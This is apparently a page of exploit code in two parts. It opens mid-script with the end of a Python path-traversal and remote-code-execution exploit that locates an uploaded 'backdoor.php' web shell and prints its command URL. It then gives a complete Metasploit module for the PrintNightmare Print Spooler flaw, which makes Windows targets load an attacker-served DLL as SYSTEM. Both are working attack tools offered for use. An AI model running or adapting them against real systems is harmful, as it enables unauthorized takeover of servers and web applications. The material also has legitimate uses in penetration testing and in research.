line in backdoor.text.split("\n"): count = count + 1 if "backdoor.php" in str(line): try: start = "\"right\"" end = " </td" line = str(line) dateStampNew = line[line.index(start)+8:line.index(end)] if (dateStampNew > dateStamp): dateStamp = dateStampNew print("The DateStamp is " + dateStamp) backdoorFile = line[line.index("href")+6:line.index("php")+3] except: print("Exception occurred") continue #print(backdoor) print('Backdoor uploaded at - > ' + HOSTNAME + 'uploads/users/' + backdoorFile + '?cmd=whoami') if __name__ == '__main__': print("You are not able to use the designated admin account because they do not have a myAccount page.\n") parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit') parser.add_argument('-url', '--host', dest='hostname', help='Project URL') parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)') parser.add_argument('-p', '--password', dest='password', help='User password') args = parser.parse_args() # Added detection if the arguments are passed and populated, if not display the arguments if (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)): main(args.hostname, args.email, args.password) else: parser.print_help() </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'windows_error' require 'ruby_smb' require 'ruby_smb/error' class MetasploitModule < Msf::Exploit::Remote prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::DCERPC include Msf::Exploit::Remote::SMB::Client::Authenticated include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::Retry include Msf::Exploit::EXE include Msf::Exploit::Deprecated moved_from 'auxiliary/admin/dcerpc/cve_2021_1675_printnightmare' PrintSystem = RubySMB::Dcerpc::PrintSystem def initialize(info = {}) super( update_info( info, 'Name' => 'Print Spooler Remote DLL Injection', 'Description' => %q{ The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request, resulting in remote code execution as NT AUTHORITY\SYSTEM. This module uses the MS-RPRN vector which requires the Print Spooler service to be running. }, 'Author' => [ 'Zhiniang Peng', # vulnerability discovery / research 'Xuefeng Li', # vulnerability discovery / research 'Zhipeng Huo', # vulnerability discovery 'Piotr Madej', # vulnerability discovery 'Zhang Yunhai', # vulnerability discovery 'cube0x0', # PoC 'Spencer McIntyre', # metasploit module 'Christophe De La Fuente', # metasploit module co-author ], 'License' => MSF_LICENSE, 'DefaultOptions' => { 'SRVHOST' => Rex::Socket.source_address }, 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ [ 'Windows', { 'Platform' => 'win', 'Arch' => [ ARCH_X64, ARCH_X86 ] }, ], ], 'DisclosureDate' => '2021-06-08', 'References' => [ ['CVE', '2021-1675'], ['CVE', '2021-34527'], ['URL', 'https://github.com/cube0x0/CVE-2021-1675'], ['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'], ['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'], ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream'] ], 'Notes' => { 'AKA' => [ 'PrintNightmare' ], 'Stability' => [CRASH_SERVICE_DOWN], 'Reliability' => [UNRELIABLE_SESSION], 'SideEffects' => [ ARTIFACTS_ON_DISK # the dll will be copied to the remote server ] } ) ) register_advanced_options( [ OptInt.new('ReconnectTimeout', [ true, 'The timeout in seconds for reconnecting to the named pipe', 10 ]) ] ) deregister_options('AutoCheck') end def check begin connect(backend: :ruby_smb) rescue Rex::ConnectionError return Exploit::CheckCode::Unknown('Failed to connect to the remote service.') end begin smb_login rescue Rex::Proto::SMB::Exceptions::LoginError return Exploit::CheckCode::Unknown('Failed to authenticate to the remote service.') end begin dcerpc_bind_spoolss rescue RubySMB::Error::UnexpectedStatusCode => e nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first if nt_status == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND print_error("The 'Print Spooler' service is disabled.") end return Exploit::CheckCode::Safe("The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description}).") end @target_arch = dcerpc_getarch # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43 if @target_arch == ARCH_X64 @environment = 'Windows x64' elsif @target_arch == ARCH_X86 @environment = 'Windows NT x86' else return Exploit::CheckCode::Detected('Successfully bound to the remote service.') end print_status("Target environment: Windows v#{simple.client.os_version} (#{@target_arch})") print_status('Enumerating the installed printer drivers...') drivers = enum_printer_drivers(@environment) @driver_path = "#{drivers.driver_path.rpartition('\\').first}\\UNIDRV.DLL" vprint_status("Using driver path: #{@driver_path}") print_status('Retrieving the path of the printer driver directory...') @config_directory = get_printer_driver_directory(@environment) vprint_status("Using driver directory: #{@config_directory}") unless @config_directory.nil? container = driver_container( p_config_file: 'C:\\Windows\\System32\\kernel32.dll', p_data_file: "\\??\\UNC\\127.0.0.1\\#{Rex::Text.rand_text_alphanumeric(4..8)}\\#{Rex::Text.rand_text_alphanumeric(4..8)}.dll" ) case add_printer_driver_ex(container) when nil # prevent the module from erroring out in case the response can't be mapped to a Win32 error code return Exploit::CheckCode::Unknown('Received unknown status code, implying the target is not vulnerable.') when ::WindowsError::Win32::ERROR_PATH_NOT_FOUND return Exploit::CheckCode::Vulnerable('Received ERROR_PATH_NOT_FOUND, implying the target is vulnerable.') when ::WindowsError::Win32::ERROR_BAD_NET_NAME return Exploit::CheckCode::Vulnerable('Received ERROR_BAD_NET_NAME, implying the target is vulnerable.') when ::WindowsError::Win32::ERROR_ACCESS_DENIED return Exploit::CheckCode::Safe('Received ERROR_ACCESS_DENIED implying the target is patched.') end Exploit::CheckCode::Detected('Successfully bound to the remote service.') end def run fail_with(Failure::BadConfig, 'Can not use an x64 payload on an x86 target.') if @target_arch == ARCH_X86 && payload.arch.first == ARCH_X64 fail_with(Failure::NoTarget, 'Only x86 and x64 targets are supported.') if @environment.nil? fail_with(Failure::Unknown, 'Failed to enumerate the driver directory.') if @config_directory.nil? super end def setup if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0 fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.') end super end def start_service file_name << '.dll' self.file_contents = generate_payload_dll super end def primer dll_path = unc if dll_path =~ /^\\\\([\w:.\[\]]+)\\(.*)$/ # targets patched for CVE-2021-34527 (but with Point and Print enabled) need to use this path style as a bypass # otherwise the operation will fail with ERROR_INVALID_PARAMETER dll_path = "\\??\\UNC\\#{Regexp.last_match(1)}\\#{Regexp.last_match(2)}" end vprint_status("Using DLL path: #{dll_path}") filename = dll_path.rpartition('\\').last container = driver_container(p_config_file: 'C:\\Windows\\System32\\kernel32.dll', p_data_file: dll_path) 3.times do add_printer_driver_ex(container) end 1.upto(3) do |directory| container.driver_info.p_config_file.assign("#{@config_directory}\\3\\old\\#{directory}\\#{filename}") break if add_printer_driver_ex(container).nil? end cleanup_service end def driver_container(**kwargs) PrintSystem::DriverContainer.new( level: 2, tag: 2, driver_info: PrintSystem::DriverInfo2.new( c_version: 3, p_name_ref_id: 0x00020000, p_environment_ref_id: 0x00020004, p_driver_path_ref_id: 0x00020008, p_data_file_ref_id: 0x0002000c, p_config_file_ref_id: 0x00020010, # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913 p_name: "#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}", p_environment: @environment, p_driver_path: @driver_path, **kwargs ) ) end def dcerpc_bind_spoolss handle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\spoolss']) vprint_status("Binding to #{handle} ...") dcerpc_bind(handle) vprint_status("Bound to #{handle} ...") end def enum_printer_drivers(environment) response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2) response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2, p_drivers: [0] * response.pcb_needed, cb_buf: response.pcb_needed) fail_with(Failure::UnexpectedReply, 'Failed to enumerate printer drivers.') unless response.p_drivers&.length DriverInfo2.read(response.p_drivers.map(&:chr).join) end def get_printer_driver_directory(environment) response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2) response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2, p_driver_directory: [0] * response.pcb_needed, cb_buf: response.pcb_needed) fail_with(Failure::UnexpectedReply, 'Failed to obtain the printer driver directory.') unless response.p_driver_directory&.length RubySMB::Field::Stringz16.read(response.p_driver_directory.map(&:chr).join).encode('ASCII-8BIT') end def add_printer_driver_ex(container) flags = PrintSystem::APD_INSTALL_WARNED_DRIVER | PrintSystem::APD_COPY_FROM_DIRECTORY | PrintSystem::APD_COPY_ALL_FILES begin response = rprn_call('RpcAddPrinterDriverEx', p_name: "\\\\#{datastore['RHOST']}", p_driver_container: container, dw_file_copy_flags: flags) rescue RubySMB::Error::UnexpectedStatusCode => e nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first message = "Error #{nt_status.name} (#{nt_status.description})" if nt_status == ::WindowsError::NTStatus::STATUS_PIPE_BROKEN # STATUS_PIPE_BROKEN is the return value when the payload is executed, so this is somewhat expected print_status('The named pipe connection was broken, reconnecting...') reconnected = retry_until_truthy(timeout: datastore['ReconnectTimeout'].to_i) do dcerpc_bind_spoolss rescue RubySMB::Error::CommunicationError, RubySMB::Error::UnexpectedStatusCode => e false else true end unless reconnected vprint_status('Failed to reconnect to the named pipe.') return nil end print_status('Successfully reconnected to the named pipe.') retry else print_error(message) end return nt_status end error = ::WindowsError::Win32.find_by_retval(response.error_status.value).first message = "RpcAddPrinterDriverEx response #{response.error_status}" message << " #{error.name} (#{error.description})" unless error.nil? vprint_status(message) error end def rprn_call(name, **kwargs) request = PrintSystem.const_get("#{name}Request").new(**kwargs) begin raw_response = dcerpc.call(request.opnum, request.to_binary_s) rescue Rex::Proto::DCERPC::Exceptions::Fault => e fail_with(Failure::UnexpectedReply, "The #{name} Print System RPC request failed (#{e.message}).") end PrintSystem.const_get("#{name}Response").read(raw_response) end class DriverInfo2Header < BinData::Record endian :little uint32 :c_version uint32 :name_offset uint32 :environment_offset uint32 :driver_path_offset uint32 :data_file_offset uint32 :config_file_offset end # this is a partial implementation that just parses the data, this is *not* the same struct as PrintSystem::DriverInfo2 # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030 DriverInfo2 = Struct.new(:header, :name, :environment, :driver_path, :data_file, :config_file) do def self.read(data) header = DriverInfo2Header.read(data) new( header, RubySMB::Field::Stringz16.read(data[header.name_offset..]).encode('ASCII-8BIT'), RubySMB::Field::Stringz16.read(data[header.environment_offset..]).encode('ASCII-8BIT'), RubySMB::Field::Stringz16.read(data[header.driver_path_offset..]).encode('ASCII-8BIT'), RubySMB::Field::Stringz16.read(data[header.data_file_offset..]).encode('ASCII-8BIT'), RubySMB::Field::Stringz16.read(data[header.config_file_offset..]).encode('ASCII-8BIT') ) end end end </code></pre>